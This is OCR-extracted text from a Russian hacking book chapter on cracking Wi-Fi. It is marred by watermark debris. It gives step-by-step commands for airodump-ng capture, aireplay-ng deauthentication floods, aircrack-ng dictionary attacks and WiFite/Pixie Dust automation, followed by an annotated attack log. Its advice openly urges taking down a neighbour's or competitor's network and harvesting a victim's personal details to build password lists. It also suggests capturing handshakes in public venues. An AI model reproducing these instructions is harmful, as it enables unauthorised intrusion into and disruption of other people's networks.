Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:

книги хакеры / Хакинг на примерах

.pdf
Скачиваний:
19
Добавлен:
19.04.2024
Размер:
30.29 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

C

 

E

 

 

 

X

 

 

 

 

 

-

 

 

 

 

 

d

 

F

 

 

 

 

 

 

t

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

to

 

 

 

 

w Click

 

Какm

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

.

 

 

 

 

 

.c

 

 

p

 

 

 

 

g

 

 

 

 

df

 

 

n

e

 

 

 

 

-xcha

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

l.1,111a 10. В1.1аш.1ва1·,1 cщ·1·1c1,1111 \\il·i-po IL'P

 

 

 

 

 

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

видно на рис. 10.9, адаптер успешно переведен в режим мониторингаClick.

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

.c

 

 

.

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Рис. 10.9. Адаптер переведен в режим мониторинга

Теперь, когда наш сетевой адаптер находится в режиме мониторинга, мы мо­ жем захватить, подходящий мимо нас трафик, используя команду airodump­ ng. Вводим команду:

airodump-ng wlanOmon

Далее вывод будет таким, как показано на рис. 10.10. Разберемся, что и к чему. В верхней части выводится список беспроводных сетей. В нижней ча­ сти - список клиентов. Обрати внимание, сейчас есть два клиента - один подключен к интересующей нас сети с BSSID D8:0D: l 7:A5:F9:F4. ESSID для этой сети мы затерли специально, чтобы по нему нельзя бьmо вычислить автора этой книги - анонимность превыше всего. Второй клиент подключен к сети ВО:4Е:26:А4:89:82 - сеть называется TP-Link 8982.

Наш следующий таг - сосредоточить наши усилия на одной из точек до­ ступа и на ее канале. Нас интересует BSSID и номер канала точки доступа (выводится в колонке СН), которую мы будем взламывать. Открой новый терминал и введи команду·

airodump-ng --bssid D8:0D:17:A5:F9:F4 -с 2 -w WPAcrack

wlanOmon

·----···················-···-·········-···········································-&I

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

· Рис. 10.10. Ре:нсим мониторинzа запущен

Здесь:

D8:0D: l 7:A5:F9:F4 - BSSID точки доступа

2 - канал, на котором работает точка доступа Wi-Fi

WPAcrack - файл, в который запишется handshake

wlanOmon - сетевой адаптер в режиме мониторинга

Как вы можешь видеть на скриншоте 1О.11, мы сейчас концентрируемся на захвате данных с одной точки доступа с BSSID D8:0D: l 7:A5:F9:F4 на канале 2. Терминал оставляем открытым!

Рис. 10.11. Захватываем данные только с определенной WiFi-cemu

----------------------------------------------------------------------------------·

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

Click

 

Чтобыm

 

 

 

 

 

 

 

 

 

 

m

w

 

 

захватить зашифрованный пароль, нам нужно, чтобы клиент прошелClick

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

o

 

w

.

 

 

 

 

 

 

.c

w

 

 

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

 

 

 

p

 

 

 

аутентификацию (подключился к Wi-Fi). Если он уже аутентифицирован, мы

 

 

g

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

можем его деаутентифицировать (отключить), тогда система автомэ:rически повторно аутентифицируется (подключится), в результате чего мы можем получить зашифрованный пароль.

То есть нам просто нужно отключить подключенных пользователей, чтобы они подключились снова. Для этого открываем еще один терминал и вводим:

$ aireplay-ng --deauth 100 -а D8:0D:17:A5:F9:F4 wlan0mon

Здесь:

100 - количество, пользователей, которые будут деаутентифицированы;

D8:0D: 17:A5:F9:F4 - BSSID точки доступа

wlan0mon - сетевой адаптер в режиме мониторинга

Если ты, как и мы, взламываешь свою собственную сеть для эксперимента,

можешь отключить только одного клиента (например, свой мобильный теле­ фон) и подключить его заново, не убивая при этом всех остальных клиентов.

Теперь при повторном подключении окно, которое мы оставили на преды­ дущем шаге поймает handshake. Давайте вернемся к нашему терминалу airodump-ng и посмотрим. В верхнем правом углу ты должен увидеть фразу:

СН 2] [Elapsed: 5 mins] [ 2020-12-14 10:45 ] [ fixed channel wlanOmon: 2 ] [ 1fPA2 handshake: D8:0D:17:A5:F9:F4

Это означает, что мы захватили зашифрованный пароль. Это уже что-то. Па­ роль у нас есть, осталось его расшифровать.

Теперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack, мы можем запустить подбор пароля. Но для этого нам нужно иметь список

с паролями, которые мы хотим использовать. Найти такой список можно за 5 минут в Гугле. Мы использовать списки паролей по умолчанию, которые есть в Kali Linux. Все эти списки слов хранятся в каталоге /usr/share/wordlists

(рис. 10.12).

Открой новый терминал и введи команду:

$ aircrack-ng WPAcrack-01.cap -w <полный путь к списку

слов>

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . · tlll

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Рис. 10.12. Список паролей

Здесь WPAcrack-01.сар файл, в который мы записывали handshake (airodump­ ng приписал в конце -О1.сар).

Сколько времени займет взлом зашифрованного пароля? Пароли взламыва­ ются по типу брутфорса - то есть программа просто пытается использовать пароль из списка слов. Если ним получится дешифровать файл WPAcrack, значит, успех. В противном случае - пробует следующий пароль. Поэтому успех зависит от твоего словаря. Понятно, что если не получится с одним списком, можешь пробовать следующий. Рано или поздно найдется слово, которое пользователь указал в качестве пароля.

Этот процесс может занять много времени. Все зависит от длины списка паролей, ты можешь ждать от нескольких минут до нескольких дней. На 2-ядерном процессоре Intel aircrack-ng подбирает чуть более 700 паролей в секунду. В виртуальной машине этот показатель может быть меньше. Когда пароль будет найден, он появится на твоем экране.

Рекомендации использованию программы:

1.Данный вид атаки эффективен для подбора пароля по списку, но практи­ чески бесполезен для рандомного подбора. Все дело во времени. Если

Wi-Fi защищен средним паролем из латинских букв и цифр, то рандом­ ный подбор займет несколько лет.

-2. При выборе списка паролей обязательно учитывай географические фак­ торы. Например, нет смысла делать подбор в ресторане Берлина по рус­ скому списку паролей. Найди список часто используемых паролей на

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - _,

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

NOW!

o

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

немецком и запасись терпением. В любом случае, ты можешь захватитьClick

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

o

 

w

.

 

 

 

 

 

 

.c

 

 

w

 

 

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

зашифрованный пароль, а продолжить расшифровку в другом месте

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

(дома, в отеле). Когда пароль будет расшифрован, ты сможешь вернуться

к той точке доступа и подключиться к ней.

3.Если тебе насолил сосед или конкурент, используй команду aireplay-ng --deauth 100 -а <BSSID> wlan0mon, чтобы «положить» его сеть.

4.Если ты взламываешь домашний Wi-Fi, то постарайся узнать какие-либо персональные данные жертвы (имя, фамилия, дата рождения, кличка со­

баки, имя ребенка и.т.д.) и сгенерировать дополнительный список паро­ лей из этих данных. Часто используются пароли вроде (этими паролями нужно обязательно дополнить твои списки паролей, причем добавить их

всамое начало списка, так как успех с этими паролями очень вероятен):

»Имя ребенка и дата рождения, например, Dima2l0611

»Номер телефона (настройщики WiFi по вызову не заморачиваются и устанавливают в качестве пароля номер телефона клиента)

»Последовательности цифр 123456789, 1234567890, 12345678900, 987654321 и т.д.

5.После того как поймал handshake, отключай работу aireplay-ng (не застав­ ляй страдать пр_остых пользователей). Конечно, если у тебя не пункт 3.

10.6. Автоматизируем взлом с помощью WiFite

Читатели, учившиеся на физмате, сейчас вспомнят, как проходит обучение. Сначала тебе объясняют 1О разных методов решения. А потом говорят, что вот есть одиннадцатый метод, который самый простой и который поможет

вбольшинстве случаев, кроме каких-то крайних значений. Аналогичная си­ туация сложилась и со взломом WiFi. В прошлом разделе было показано, как использовать целый комплекс программ для взлома WiFi-ceти. В этом разделе мы рассмотрим инструмент WiFite, позволяющий весь этот процесс автоматизировать. Он использует те же инструменты, что мы использовали

впрошлом разделе и некоторые дополнительные. Итак, обо всем по порядку.

WiFite - это инструмент для автоматизированной беспроводной атаки и ра­ ботает он только в Linux, то есть никаких Windows-вepcий или версий для macOS нет.

Wifite бьш создан для использования с дистрибутивами на тестирование на

 

проникновение, такими как Kali Linux, Pentoo, ВасkВох; любыми дистри-

·-----------------------------------------------------------

···-···--··--··-·---·--

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

бутивамиm

 

 

 

 

 

 

 

 

 

 

 

m

 

Linux с пропатченным для инжекта беспроводными драйверамиw Click.

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

По-видимому, также работает на UЬuntu, DeЬian и Fedora.

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

Программу нужно запускать только с полномочиями root, что необходимо для программ, которые использует WiFite при взломе WiFi. Запускать что­ либо от root мы бы не рекомендовали, поэтому лучше всего установить Kali Linux в виртуальную машину, подключить USB адаптер WiFi (да, придется потратиться ради безопасности). Не нужно запускать этот инструмент на системе, которую ты используешь для ежедневной работы. Если же ты на каждый день используешь Windows, то выбора особо нет - устанавливай

Kali Linux и в нем уже будет WiFite.

Wifite предполагает, что у тебя есть беспроводной адаптер и подходящие драйверы, пропатченные для инжекта и неразборчивого режима/режима на­ блюдения. Такие есть в Kali Linux, ВасkВох, Pentoo. В других дистрибути­ вах обо всем этом нужно позаботиться самостоятельно.

Инструмент может атаковать множество зашифрованных сетей WEP, WPA и WPS подряд. Этот инструмент настраивается до автоматизма всего лишь не­ сколькими аргументами. Цель Wifite - быть инструментом беспроводного аудита по принципу «установил и забыл)). Другими словами, ты запускаешь его, видишь список беспроводных сетей, выбираешь цели и ждешь, пока инструмент взломает выбранную тобой сеть. Можешь даже атаковать даже все точки доступа вокруг.

Особенности инструмента:

• сортирует цели по сигналу (в dB); первыми взламывает самые близкие точки доступа

автоматически деаутентифицирует клиентов скрытых сетей для раскры­

 

тия их SSID

 

 

 

 

набор фильтров для точного указания, что именно атаковать (wep/wpa,

 

выше определенной силы сигнала, каналы и т.д.)

 

гибкие настройки (таймауты, пакеты в секунду, другое)

 

функции «анонимности)): смена МАС на случайный адрес перед атакой,

 

затем обратная смена, когда атака завершена

 

все захваченные рукопожатия WPA копируются в текущую директорию

 

wifite.py

 

 

 

 

умная деаутентификация WPA; циклы между деаутентификацией всех

 

клиентов и широковещательной

 

 

 

 

ID-·····--------

·--------------

··-------

·----··---·---··---·---------

·---·---·---·--·

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Reaver

выяв­

tshark в

. ----

--

--

-- -- ---- -- -- -- ..,.

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

-·-··-·-- · .;. ...

 

 

 

 

d

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

 

F

 

 

 

 

 

 

 

t

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

 

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

Pixiewpsm

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

- это инструмент, написанный на С, он используется для офлайнClick

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

брутфорса пина WPS посредством эксплуатирования низкой или несуще­

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

ствующий энтропии некоторых точек доступа (атака pixie dust). Запуск:

wifite

wifite -pow 40 -wps

При запуске без параметров программа ищет все доступные точки доступа. Во втором случае программа будет атаковать точки доступа с мощностью более 40 dB (-pow 40), используя атаку WPS (-wps). Как правило, если уро­ вень сигнала ниже 40 dB, то точка доступа находится дальше, чем хотелось бы и даже если ты ее взломаешь, что хорошего Интернет-соединения через нее не получишь.

Посмотрим на программу в действии. Запусти ее без параметров. Если не хватает каких-то утилит, программа в самом начале сообщит об этом. Фор­ мат сообщения об отсутствующей программе следующий:

[!] Warning: Recommended арр <название> was not found. install <команда>

Приводится название программы и команда, которую необходимо ввести для ее установки. Настоятельно рекомендуется установить все отсутствую­ щие программы.

Рис. 10.13. Программа ищет WiFi-cemu. SSID взламываемой сети мы, как всег-

да, закрыли

 

.....................................................................................

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

mConflicting processes

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

1 1а11а I О. В i. 1а,11,1 вае\1 l'Ol't' 1с1,1111

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

\\ i 1· i-po 1 rp

BUY

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

all Enter.

Начапо атаки против вuбранной точки доступа

Starting attacks against D8:0D:17:A5:F9:F4 (SSID)

Атака WPS Pixie-Dust не удапась таймаут

[+] SSID (ббdЬ) WPS Pixie-Dust: [--3s] Failed: Timeout after

300 seconds

Атака WPS NULL PIN не удапась таймаут

[+]

SSID (67dЬ) WPS NULL PIN: [--3s] Failed: Timeout after 300

seconds

 

Атака WPS PIN Attack также не удапась

CJDODJCOM много таймаутов

[+]

SSID (ббdЬ) WPS PIN Attack: [17m30s

PINs:1] Failed: Тоо many

timeouts (100)

i Атаки РМКID пропуска-, поскольку отсутств}'1D'1' необходимые

утипитw

[!] Skipping PMKID attacks, missing required tools: hcxdumptool, hcxpcaptool

Атака WPA Bandshake capture

захват пароля обнаружен новый

JС.JtИент

 

 

[+] SSID (72dЬ)

WPA Handshake capture: Discovered new client:

<МАС-адрес>

 

 

Пароm. Зах8ачен. Ура!

 

[+] SSID (71db)

WPA Handshake

capture: Captured handshake

i Сохршем КОПИJ:1 handshake в файле hs/handshake_SSID_BSSID.cap в

катапоrе /root

[+]saving сору of handshake to hs/handshake SSID_BSSID.cap saved

Ана.пиз защифрованноrо пароля

[+]analysis of captured handshake file:

tshark сообщает, что файл содержит корректный handshake

[+] tshark: .сар file contains а valid handshake for D8:0D:17:A5:F9:F4

i а вот aircrack (не aircrack-ng) сообщает, что не все хорошо,

провер11D1 позже

·-----------------------------------------------------------------------------------

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

r

 

 

D

 

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

 

 

o

 

P

 

 

 

 

 

 

 

 

 

 

 

o

 

 

 

 

 

NOW!

 

 

 

 

 

 

 

 

 

 

NOW!

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

[!]

 

m

aircrack: .сар file does not contain а valid handshake

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

df

 

in

 

 

o

 

 

 

w

 

-df

 

 

n

 

 

o

 

 

.

 

 

ПW'l'аеися взпоиа'l'Ь nаропь с noиoЩ11aJD файпа wordlist-probaЬle.txt

.

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

-xcha

 

e

 

 

 

 

 

 

 

 

 

-x cha

 

e

 

 

 

 

 

 

в нем

 

 

 

 

 

 

 

 

 

 

 

 

 

 

iсписок nаропей по уиопчаюш.

[+]Cracking WPA Handshake: Running aircrack-ng with wordlist­ probaЫe.txt wordlist

[+]Cracking WPA Handshake: 100% ЕТА: 0s@ 1686.7 kbps (current key: 11225556)

iФай.п wordlist-probaЬle.txt не содер:11СИТ nаропь

[!] Failed to crack handshake: wordlist-probaЫe.txt did not contain password

i з-ершение атаки, ■1о1Ход

[+] Finished attacking 1 target(s), exiting

iПримечание: оста■пкеи интерфейс • ре,киие иоНИ'l'орииrа

[!]Note: Leaving interface in Monitor Mode!

iКак законЧИ'l'е, ■lollUll:)1Dl'1' ре,кии иоНИ'l'оринrа ко.но командой

airmon-nq stop <iface>

[!] То disaЫe Monitor mode when finished: airmon-ng stop wlanOmon

root,

cd ~/hs

aircrack-ng handshake_SSID_BSSID.cap -w password.txt

--- - - - - - -

 

 

 

 

 

- - - - - - - - - - -

- - - - - -

- - - - - - - -- -

- -

- - - - - - - - - - - - - -

- - - - - .